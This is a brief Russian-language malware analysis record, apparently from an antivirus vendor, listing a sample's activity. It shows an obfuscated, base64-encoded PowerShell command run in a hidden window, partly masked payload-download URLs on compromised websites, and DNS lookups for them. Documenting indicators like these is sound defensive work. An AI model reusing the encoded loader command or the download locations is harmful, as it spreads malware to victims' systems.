Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD...
- http://bu####roperties.com/lyhvmiq/s_ia_4uaq/
- http://ba####design.com/cgi-bin/nxr5_o_d6vmj/
- http://www.ci###amily.org/phpMyAdmin-4.7.9-all-languages/5um_oot_hz8/
- http://bo###erg.net/wp-admin/ogfv5_4_x2l/
- DNS ASK bu####roperties.com
- DNS ASK ba####design.com
- DNS ASK ca####tochange.org
- DNS ASK ci###amily.org
- DNS ASK bo###erg.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD...' (со скрытым окном)